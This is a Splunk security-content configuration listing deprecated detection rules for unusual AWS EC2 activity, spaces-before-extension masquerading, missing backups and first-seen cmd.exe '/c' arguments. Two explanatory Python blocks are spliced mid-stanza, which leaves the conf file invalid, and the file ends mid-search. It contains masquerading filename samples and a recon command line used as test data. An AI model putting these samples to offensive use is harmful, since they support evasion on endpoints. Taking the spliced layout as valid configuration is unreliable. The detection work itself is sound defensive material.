action.escu.eli5 = This search looks for EC2 instances being modified by users who have not previously modified them. This search is deprecated and has been translated to use the latest Change data model.
action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. This search works best when you run the "Previously Seen EC2 Launches By User" support search once to create a history of previously seen ARNs. To add or remove APIs that modify an EC2 instance, edit the macro `ec2_modification_api_calls`.
action.escu.known_false_positives = It's possible that a new user will start to modify EC2 instances when they haven't before for any number of reasons. Verify with the user that is modifying instances that this is the intended behavior.
action.escu.creation_date = 2020-07-21
action.escu.modification_date = 2020-07-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - EC2 Instance Modified With Previously Unseen User - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["Unusual AWS EC2 Modifications"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - EC2 Instance Modified With Previously Unseen User - Rule
action.correlationsearch.annotations = {"analytic_story": ["Unusual AWS EC2 Modifications"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` `ec2_modification_api_calls` [search `cloudtrail` `ec2_modification_api_calls` errorCode=success | stats earliest(_time) as firstTime latest(_time) as lastTime by userIdentity.arn | rename userIdentity.arn as arn | inputlookup append=t previously_seen_ec2_modifications_by_user | stats min(firstTime) as firstTime, max(lastTime) as lastTime by arn | outputlookup previously_seen_ec2_modifications_by_user | eval newUser=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newUser=1 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rename arn as \
userIdentity.arn | table userIdentity.arn] | spath output=dest responseElements.instancesSet.items{}.instanceId | spath output=user userIdentity.arn | table _time, user, dest | `ec2_instance_modified_with_previously_unseen_user_filter`

[ESCU - EC2 Instance Started In Previously Unseen Region - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for AWS CloudTrail events where an instance is started in a particular region in the last hour and then compares it to a lookup file of previously seen regions where an instance was started.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1535"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for AWS CloudTrail events where an instance is started in a particular region in the last hour and then compares it to a lookup file of previously seen regions where an instance was started.
action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. Run the "Previously seen AWS Regions" support search only once to create a baseline of previously seen regions. This search is deprecated and has been translated to use the latest Change data model.
action.escu.known_false_positives = It's possible that a user has unknowingly started an instance in a new region. Please verify that this activity is legitimate.
action.escu.creation_date = 2018-02-23
action.escu.modification_date = 2018-02-23
action.escu.confidence = high
action.escu.full_search_name = ESCU - EC2 Instance Started In Previously Unseen Region - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS Cryptomining", "Suspicious AWS EC2 Activities"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - EC2 Instance Started In Previously Unseen Region - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Cryptomining", "Suspicious AWS EC2 Activities"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1535"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` earliest=-1h StartInstances | stats earliest(_time) as earliest latest(_time) as latest by awsRegion | inputlookup append=t previously_seen_aws_regions.csv | stats min(earliest) as earliest max(latest) as latest by awsRegion | outputlookup previously_seen_aws_regions.csv | eval regionStatus=if(earliest >= relative_time(now(),"-1d@d"), "Instance Started in a New Region","Previously Seen Region") | `security_content_ctime(earliest)` | `security_content_ctime(latest)` | where regionStatus="Instance Started in a New Region" | \
`ec2_instance_started_in_previously_unseen_region_filter`

[ESCU - EC2 Instance Started With Previously Unseen AMI - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for EC2 instances being created with previously unseen AMIs. This search is deprecated and has been translated to use the latest Change data model.
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for EC2 instances being created with previously unseen AMIs. This search is deprecated and has been translated to use the latest Change data model.
action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. This search works best when you run the "Previously Seen EC2 AMIs" support search once to create a history of previously seen AMIs.
action.escu.known_false_positives = After a new AMI is created, the first systems created with that AMI will cause this alert to fire. Verify that the AMI being used was created by a legitimate user.
action.escu.creation_date = 2018-03-12
action.escu.modification_date = 2018-03-12
action.escu.confidence = high
action.escu.full_search_name = ESCU - EC2 Instance Started With Previously Unseen AMI - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS Cryptomining"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - EC2 Instance Started With Previously Unseen AMI - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Cryptomining"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName=RunInstances [search `cloudtrail` eventName=RunInstances errorCode=success | stats earliest(_time) as firstTime latest(_time) as lastTime by requestParameters.instancesSet.items{}.imageId | rename requestParameters.instancesSet.items{}.imageId as amiID | inputlookup append=t previously_seen_ec2_amis.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by amiID | outputlookup previously_seen_ec2_amis.csv | eval newAMI=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where newAMI=1 | rename amiID as requestParameters.instancesSet.items{}.imageId | table requestParameters.instancesSet.items{}.imageId] | \
rename requestParameters.instanceType as instanceType, responseElements.instancesSet.items{}.instanceId as dest, userIdentity.arn as arn, requestParameters.instancesSet.items{}.imageId as amiID | table firstTime, lastTime, arn, amiID, dest, instanceType | `ec2_instance_started_with_previously_unseen_ami_filter`

[ESCU - EC2 Instance Started With Previously Unseen Instance Type - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for EC2 instances being created with previously unseen instance types. This search is deprecated and has been translated to use the latest Change data model.
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for EC2 instances being created with previously unseen instance types. This search is deprecated and has been translated to use the latest Change data model.
action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. This search works best when you run the "Previously Seen EC2 Instance Types" support search once to create a history of previously seen instance types.
action.escu.known_false_positives = It is possible that an admin will create a new system using a new instance type never used before. Verify with the creator that they intended to create the system with the new instance type.
action.escu.creation_date = 2020-02-07
action.escu.modification_date = 2020-02-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - EC2 Instance Started With Previously Unseen Instance Type - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS Cryptomining"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - EC2 Instance Started With Previously Unseen Instance Type - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Cryptomining"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName=RunInstances [search `cloudtrail` eventName=RunInstances errorCode=success | fillnull value="m1.small" requestParameters.instanceType | stats earliest(_time) as earliest latest(_time) as latest by requestParameters.instanceType | rename requestParameters.instanceType as instanceType | inputlookup append=t previously_seen_ec2_instance_types.csv | stats min(earliest) as earliest max(latest) as latest by instanceType | outputlookup previously_seen_ec2_instance_types.csv | eval newType=if(earliest >= relative_time(now(), "-70m@m"), 1, 0) | `security_content_ctime(earliest)` | `security_content_ctime(latest)` | where newType=1 | rename instanceType as \
requestParameters.instanceType | table requestParameters.instanceType] | spath output=user userIdentity.arn | rename requestParameters.instanceType as instanceType, responseElements.instancesSet.items{}.instanceId as dest | table _time, user, dest, instanceType | `ec2_instance_started_with_previously_unseen_instance_type_filter`

[ESCU - EC2 Instance Started With Previously Unseen User - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for EC2 instances being created by users who have not created them before. This search is deprecated and has been translated to use the latest Change data model.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for EC2 instances being created by users who have not created them before. This search is deprecated and has been translated to use the latest Change data model.
action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. This search works best when you run the "Previously Seen EC2 Launches By User" support search once to create a history of previously seen ARNs.
action.escu.known_false_positives = It's possible that a user will start to create EC2 instances when they haven't before for any number of reasons. Verify with the user that is launching instances that this is the intended behavior.
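The "previously unseen" EC2 searches in this file (modified-by-user, region, AMI, instance type, launched-by-user) and the "First time seen command line argument" search further down all share one pattern: aggregate earliest/latest per key, `inputlookup append=t` the baseline lookup, `stats min/max by key`, `outputlookup` the merged result, then alert on keys whose firstTime is inside the current window. The following is an added example, not code from the Splunk security_content project: it models that pattern in Python with an in-memory lookup table and constructed CloudTrail-style and Endpoint.Processes-style events, so the write-back behaviour (a key alerts only on the run that first records it) can be checked. The CloudTrail field names are the ones the searches use; the sample events, ARNs, AMI IDs and baseline contents are constructed.

```python
"""Added example (not security_content code): the 'previously seen' baseline pattern."""

WINDOW_SECONDS = 70 * 60   # relative_time(now(), "-70m@m") in the searches
DAY = 86_400
NOW = 1_700_000_000        # fixed 'now' so the example is deterministic


def update_baseline(lookup: dict, events, key_fn, now: float,
                    window: int = WINDOW_SECONDS) -> list:
    """Equivalent of:  stats earliest/latest by key | inputlookup append=t <lookup>
    | stats min(firstTime) max(lastTime) by key | outputlookup <lookup>
    | where firstTime >= now - window.
    `lookup` maps key -> (firstTime, lastTime) and is written back (mutated) on every
    run, which is why a key only alerts on the run that first records it."""
    seen_now: dict = {}
    for ev in events:
        key = key_fn(ev)
        if key is None:                # event does not satisfy the inner search's filters
            continue
        t = ev["_time"]
        first, last = seen_now.get(key, (t, t))
        seen_now[key] = (min(first, t), max(last, t))
    for key, (first, last) in seen_now.items():
        old_first, old_last = lookup.get(key, (first, last))
        lookup[key] = (min(old_first, first), max(old_last, last))
    cutoff = now - window
    return sorted(k for k, (first, _) in lookup.items() if first >= cutoff)


# Key functions, one per stanza. They return None for events the inner search excludes.
def _successful_run(ev) -> bool:
    return ev.get("eventName") == "RunInstances" and ev.get("errorCode") == "success"


def key_user_arn(ev):          # EC2 Instance Started With Previously Unseen User
    return ev["userIdentity"]["arn"] if _successful_run(ev) else None


def key_ami(ev):               # EC2 Instance Started With Previously Unseen AMI
    if not _successful_run(ev):
        return None
    return ev["requestParameters"]["instancesSet"]["items"][0]["imageId"]


def key_instance_type(ev):     # ... Previously Unseen Instance Type (fillnull -> m1.small)
    if not _successful_run(ev):
        return None
    return ev["requestParameters"].get("instanceType", "m1.small")


def key_region(ev):            # ... Previously Unseen Region: no errorCode filter, 1-day window
    return ev.get("awsRegion") if ev.get("eventName") == "StartInstances" else None


def key_cmd_line(ev):          # First time seen command line argument (cmd.exe with " /c ")
    if ev.get("process_name") != "cmd.exe" or " /c " not in ev.get("process", ""):
        return None
    return ev["process"]


# Constructed sample events (not real logs).
CLOUDTRAIL = [
    {"_time": NOW - 600, "eventName": "RunInstances", "errorCode": "success", "awsRegion": "us-east-1",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/alice"},
     "requestParameters": {"instanceType": "t3.micro", "instancesSet": {"items": [{"imageId": "ami-0a1b2c3d"}]}}},
    {"_time": NOW - 300, "eventName": "RunInstances", "errorCode": "success", "awsRegion": "us-east-1",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/mallory"},
     "requestParameters": {"instanceType": "p3.16xlarge", "instancesSet": {"items": [{"imageId": "ami-0deadbee"}]}}},
    # Denied call: errorCode != success, so it never enters the baseline
    {"_time": NOW - 200, "eventName": "RunInstances", "errorCode": "Client.UnauthorizedOperation",
     "awsRegion": "us-east-1", "userIdentity": {"arn": "arn:aws:iam::123456789012:user/eve"},
     "requestParameters": {"instanceType": "c5.xlarge", "instancesSet": {"items": [{"imageId": "ami-0bad0bad"}]}}},
    {"_time": NOW - 100, "eventName": "StartInstances", "awsRegion": "ap-southeast-1",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/mallory"}},
]
PROCESSES = [
    {"_time": NOW - 50, "process_name": "cmd.exe", "process": "cmd.exe /c whoami /all"},
    {"_time": NOW - 40, "process_name": "cmd.exe", "process": "cmd.exe /k echo hi"},
]


def _seeded(key: str, now: float) -> dict:
    """A baseline lookup that already knows one key from a month ago."""
    return {key: (now - 30 * DAY, now - DAY)}


def demo(now: float = NOW) -> dict:
    """Run each stanza's baseline once, then re-run the user baseline two hours later
    over the same events to show that nothing alerts a second time."""
    users = _seeded("arn:aws:iam::123456789012:user/alice", now)
    first = {
        "new_user": update_baseline(users, CLOUDTRAIL, key_user_arn, now),
        "new_ami": update_baseline(_seeded("ami-0a1b2c3d", now), CLOUDTRAIL, key_ami, now),
        "new_instance_type": update_baseline(_seeded("t3.micro", now), CLOUDTRAIL, key_instance_type, now),
        "new_region": update_baseline(_seeded("us-east-1", now), CLOUDTRAIL, key_region, now, window=DAY),
        "new_cmd_line": update_baseline(_seeded("cmd.exe /c dir", now), PROCESSES, key_cmd_line, now),
    }
    second = update_baseline(users, CLOUDTRAIL, key_user_arn, now + 2 * 3600)
    return {"first_run": first, "second_run_new_user": second}


if __name__ == "__main__":
    print(demo())
```

Two properties of the pattern follow directly from the code: the lookup is rewritten on every scheduled run, so a key that first appears while the search is disabled or skipped is baselined silently the next time it runs; and the region search uses a one-day window against `-1d@d` rather than the 70-minute window, so the same region can alert on more than one hourly run in its first day (the `window=DAY` argument approximates that without the snap-to-midnight).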
action.escu.creation_date = 2020-07-21
action.escu.modification_date = 2020-07-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - EC2 Instance Started With Previously Unseen User - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS Cryptomining", "Suspicious AWS EC2 Activities"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - EC2 Instance Started With Previously Unseen User - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Cryptomining", "Suspicious AWS EC2 Activities"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName=RunInstances [search `cloudtrail` eventName=RunInstances errorCode=success | stats earliest(_time) as firstTime latest(_time) as lastTime by userIdentity.arn | rename userIdentity.arn as arn | inputlookup append=t previously_seen_ec2_launches_by_user.csv | stats min(firstTime) as firstTime, max(lastTime) as lastTime by arn | outputlookup previously_seen_ec2_launches_by_user.csv | eval newUser=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newUser=1 | `security_content_ctime(firstTime)` | \
`security_content_ctime(lastTime)` | rename arn as userIdentity.arn | table userIdentity.arn] | rename requestParameters.instanceType as instanceType, responseElements.instancesSet.items{}.instanceId as dest, userIdentity.arn as user | table _time, user, dest, instanceType | `ec2_instance_started_with_previously_unseen_user_filter`

[ESCU - Execution of File With Spaces Before Extension - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for processes launched from files with at least five spaces in the name before the extension. This is typically done to obfuscate the file extension by pushing it outside of the default view.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036.003"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search looks for processes launched from files with at least five spaces in the name before the extension. This is typically done to obfuscate the file extension by pushing it outside of the default view.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. \
Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = None identified.
action.escu.creation_date = 2020-11-19
action.escu.modification_date = 2020-11-19
action.escu.confidence = high
action.escu.full_search_name = ESCU - Execution of File With Spaces Before Extension - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows File Extension and Association Abuse", "Masquerading - Rename System Utilities"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Execution of File With Spaces Before Extension - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows File Extension and Association Abuse", "Masquerading - Rename System Utilities"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for processes launched from files with at least five spaces in the name before the extension. This is typically done to obfuscate the file extension by pushing it outside of the default view.
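The description of this stanza says "at least five spaces", but its search condition is the wildcard `Processes.process = "* .*"`, which matches any process value containing a single space followed by a dot (for instance `cmd.exe /c dir .\build`). The following is an added example, not code from the Splunk security_content project: it applies both the wildcard the search uses and a stricter regex for the five-space case to constructed Endpoint.Processes.process values, so the gap between the two is visible and the stricter condition can be reused in the filter macro. The regex definition of "five spaces before the extension" is an assumption of this example.

```python
"""Added example (not security_content code): spaces-before-extension checks."""
import fnmatch
import re

SPL_WILDCARD = "* .*"   # what `where Processes.process = "* .*"` matches in the search

# Assumed reading of the description: at least five spaces immediately before a dot that
# starts a short extension, with a quote, whitespace or end-of-string after the extension.
FIVE_SPACES_RE = re.compile(r" {5,}\.\w{1,5}(?=[\s\"']|$)")

# Constructed command lines (not real telemetry).
SAMPLE_PROCESSES = [
    "C:\\Users\\bob\\Downloads\\invoice.pdf                    .exe",
    "\"C:\\Users\\bob\\Pictures\\photo.jpg     .scr\" /s",
    "cmd.exe /c dir .\\build",        # one space before a dot: wildcard hit, not padded
    "C:\\tmp\\report.txt .exe",       # one space before the extension: not five
    "notepad.exe C:\\notes.txt",      # benign, matches neither
]


def spl_match(process: str) -> bool:
    """Splunk wildcard semantics of "* .*": a space followed by a dot anywhere in the value."""
    return fnmatch.fnmatchcase(process, SPL_WILDCARD)


def padded_extension(process: str) -> bool:
    """Stricter check: five or more spaces directly before the extension."""
    return FIVE_SPACES_RE.search(process) is not None


def classify(processes=SAMPLE_PROCESSES) -> dict:
    """Return the values each check flags, so the difference between them is visible."""
    return {
        "spl_wildcard": [p for p in processes if spl_match(p)],
        "five_spaces": [p for p in processes if padded_extension(p)],
    }


if __name__ == "__main__":
    for name, hits in classify().items():
        print(name)
        for h in hits:
            print("   ", repr(h))
```

In SPL the stricter condition is the same idea expressed as a regex filter after the tstats, for example `| regex process=" {5,}\.\w{1,5}(\s|$)"` placed before the filter macro; the tstats `where` clause itself cannot express "five spaces" with a plain wildcard.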
action.notable.param.rule_title = Execution of File With Spaces Before Extension
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count values(Processes.process_path) as process_path min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = "* .*" by Processes.dest Processes.user Processes.process Processes.process_name | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | `execution_of_file_with_spaces_before_extension_filter`

[ESCU - Extended Period Without Successful Netbackup Backups - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search returns a list of hosts that have not successfully completed a backup in over a week. Deprecated because it is an infrastructure monitoring search rather than a security detection.
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search returns a list of hosts that have not successfully completed a backup in over a week. Deprecated because it is an infrastructure monitoring search rather than a security detection.
action.escu.how_to_implement = To successfully implement this search you need to first obtain data from your backup solution, either from the backup logs on your hosts, or from a central server responsible for performing the backups. If you do not use Netbackup, you can modify this search for your backup solution. \
Depending on how often you back up your systems, you may want to modify how far in the past to look for a successful backup, other than the default of seven days.
action.escu.known_false_positives = None identified
action.escu.creation_date = 2017-09-12
action.escu.modification_date = 2017-09-12
action.escu.confidence = high
action.escu.full_search_name = ESCU - Extended Period Without Successful Netbackup Backups - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Monitor Backup Solution"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Extended Period Without Successful Netbackup Backups - Rule
action.correlationsearch.annotations = {"analytic_story": ["Monitor Backup Solution"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `netbackup` MESSAGE="Disk/Partition backup completed successfully." | stats latest(_time) as latestTime by COMPUTERNAME | rename COMPUTERNAME as dest | eval isOutlier=if(latestTime <= relative_time(now(), "-7d@d"), 1, 0) | search isOutlier=1 | `security_content_ctime(latestTime)` | table latestTime, dest | `extended_period_without_successful_netbackup_backups_filter`

[ESCU - First time seen command line argument - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. \
This search looks for command-line arguments that use a `/c` parameter to execute a command that has not previously been seen.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.001", "T1059.003"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search looks for command-line arguments that use a `/c` parameter to execute a command that has not previously been seen.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Legitimate programs can also use command-line arguments to execute. Please verify the command-line arguments to check what command/program is being executed. \
We recommend customizing the `first_time_seen_command_line_argument_filter` macro to exclude legitimate parent_process_name values.
action.escu.creation_date = 2020-07-21
action.escu.modification_date = 2020-07-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - First time seen command line argument - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["DHS Report TA18-074A", "Suspicious Command-Line Executions", "Orangeworm Attack Group", "Possible Backdoor Activity Associated With MUDCARP Espionage Campaigns", "Hidden Cobra Malware"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - First time seen command line argument - Rule
action.correlationsearch.annotations = {"analytic_story": ["DHS Report TA18-074A", "Suspicious Command-Line Executions", "Orangeworm Attack Group", "Possible Backdoor Activity Associated With MUDCARP Espionage Campaigns", "Hidden Cobra Malware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.001", "T1059.003"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = cmd.exe Processes.process = "* /c *" by Processes.process Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | \
